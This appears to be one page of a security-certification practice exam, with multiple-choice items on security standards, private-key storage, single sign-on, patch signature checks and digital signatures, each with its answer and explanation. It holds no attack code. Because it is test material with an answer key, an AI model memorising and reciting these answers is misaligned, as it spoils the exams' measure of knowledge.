A standard is the correct document for mandatory, measurable security settings such as screen-lock timeouts, encryption, and firewall configuration. Standards turn policy intent into specific requirements that can be checked and enforced across devices, which helps keep configurations consistent and easier to audit.

Why this answer

A standard is the correct document type because it defines mandatory technical requirements that must be uniformly enforced across all company laptops. In this scenario, the screen-lock timeout, disk encryption setting (e.g., BitLocker or FileVault), and local firewall configuration (e.g., Windows Defender Firewall with Advanced Security) are non-negotiable controls that must be applied identically to every device to meet security policy. Standards are binding and often reference specific configuration baselines, such as CIS Benchmarks or NIST SP 800-53, ensuring consistent implementation.

Exam trap

The trap here is confusing a standard with a guideline, as many candidates assume any security document is advisory, but standards are explicitly mandatory and enforceable, unlike guidelines which are optional recommendations.

How to eliminate wrong answers

Option A is wrong because a guideline is advisory and suggests best practices that employees may choose to follow or ignore, whereas the scenario requires mandatory settings that must be enforced. Option C is wrong because a risk register is a document that identifies, assesses, and tracks security vulnerabilities and risks, not a document that defines mandatory technical configurations for laptops. Option D is wrong because a business impact analysis (BIA) identifies critical business functions and the impact of their disruption, not the specific technical settings like screen-lock timeout or disk encryption.

972
Multi-Selecthard

A microservices team stores service private keys inside container images and renews certificates manually once a year. Security wants to reduce damage if a node is compromised and keep certificate trust manageable at scale. Which two changes are the best fit? Select two.

Select 2 answers
A.Store private keys in an HSM-backed secrets manager or equivalent key vault.
B.Embed private keys in the container image so redeployments are simpler.
C.Use an internal CA and automate short-lived certificate renewal.
D.Replace the CA with a self-signed certificate on every node.
E.Convert the key file to base64 before storing it in the image.
AnswersA, C

Keeping private keys out of the image and out of the filesystem reduces the chance that a node compromise exposes long-term secrets. A managed key vault or HSM-backed store is much harder to copy than a baked-in file.

Why this answer

Option A is correct because storing private keys in an HSM-backed secrets manager (e.g., AWS KMS, Azure Key Vault, or HashiCorp Vault with an HSM module) ensures that keys never leave the secure boundary of the HSM. This prevents an attacker who compromises a container or node from extracting the private key material, as the key is used for cryptographic operations via API calls rather than being stored in the filesystem. This directly reduces the blast radius of a node compromise.

Exam trap

The trap here is that candidates often think embedding keys in images is acceptable for simplicity, but the exam tests the principle that private keys must never be stored in the same artifact as the application, and that manual renewal is not scalable for microservices.

973
MCQeasy

Employees must sign in to several cloud applications with their corporate account, and terminated users should lose access without separate password resets in each app. What is the best solution?

A.Create a separate local username and password in every cloud application.
B.Use federation with single sign-on from a central identity provider.
C.Store the same shared password in a password manager for all applications.
D.Allow each application to authenticate users only by device MAC address.
AnswerB

Federation with SSO is the best option because employees authenticate once with the corporate identity provider and then access multiple applications through trusted token exchange. This reduces password sprawl, improves user convenience, and makes offboarding faster because disabling the central account removes access across connected services. It also supports stronger controls such as MFA at the identity provider rather than repeating them in every application.

Why this answer

Federation with single sign-on (SSO) from a central identity provider (IdP) allows users to authenticate once using their corporate account, and the IdP issues security tokens (e.g., SAML assertions or OIDC tokens) that each cloud application trusts. When a user is terminated, the administrator disables the account in the IdP, and all applications immediately reject the user's tokens, eliminating the need for separate password resets in each app.

Exam trap

The trap here is that candidates confuse password managers (which store credentials but do not provide centralized revocation) with federation, or they mistakenly think MAC address authentication is viable for cloud applications, when in fact MAC addresses are link-layer identifiers not usable over the internet.

How to eliminate wrong answers

Option A is wrong because creating separate local usernames and passwords in every cloud application violates the requirement for centralized access control and would require manual password resets in each app upon termination. Option C is wrong because storing the same shared password in a password manager does not provide centralized revocation; the password would still need to be changed in every application individually to block access. Option D is wrong because authenticating by device MAC address is not feasible for cloud applications (MAC addresses are not transmitted over the internet) and does not support user-level identity or termination.

974
Multi-Selecthard

Before installing a vendor patch package on hundreds of endpoints, the security team wants to confirm the file was published by the vendor and was not altered during download. Which two verification steps should the team perform? Select two.

Select 2 answers
A.Verify the package signature with the vendor's public key.
B.Compare the downloaded package hash to the hash in the signed manifest.
C.Decrypt the package with the vendor's private key before installation.
D.Rotate the organization's internal encryption key before downloading.
E.Check only the file timestamp and size on disk.
AnswersA, B

A valid signature proves the package came from the holder of the vendor's private key.

Why this answer

Option A is correct because verifying the package signature with the vendor's public key confirms the package was cryptographically signed by the vendor, proving its authenticity and integrity. This process uses asymmetric cryptography where the vendor signs the package with their private key, and the security team uses the corresponding public key to validate that signature. It ensures the file was not tampered with after signing and that it originated from the claimed vendor.

Exam trap

The trap here is that candidates confuse signature verification with encryption/decryption roles, mistakenly thinking the vendor's private key is used to decrypt the package, when in fact the private key is used to sign and the public key to verify.

975
MCQmedium

A legal department needs a contract file that can later prove who signed it and whether the content changed after signing. Which cryptographic mechanism should be used?

A.Digital signature
B.Symmetric encryption
C.Hashing
D.Tokenization
AnswerA

Digital signatures provide tamper detection and signer validation using asymmetric cryptography.

Why this answer

A digital signature provides non-repudiation, ensuring the signer cannot deny signing the document, and integrity, detecting any changes after signing. It uses asymmetric cryptography where the signer's private key creates the signature, and the public key verifies it, making it the correct choice for proving both identity and content integrity.

Exam trap

The trap here is that candidates confuse hashing (which provides integrity) with digital signatures (which provide both integrity and non-repudiation), leading them to pick hashing when the question explicitly requires proof of who signed it.

How to eliminate wrong answers

Option B is wrong because symmetric encryption only provides confidentiality (secrecy) of the contract file, not proof of who signed it or integrity verification; it uses a shared key that cannot uniquely tie a signature to an individual. Option C is wrong because hashing only provides integrity by producing a fixed-size hash of the content, but it does not prove who signed it or offer non-repudiation; anyone can compute the same hash. Option D is wrong because tokenization replaces sensitive data with a non-sensitive placeholder (token) for data protection, typically for payment or PII, and does not provide signing proof or integrity verification.

Page 12

Page 13 of 16

Page 14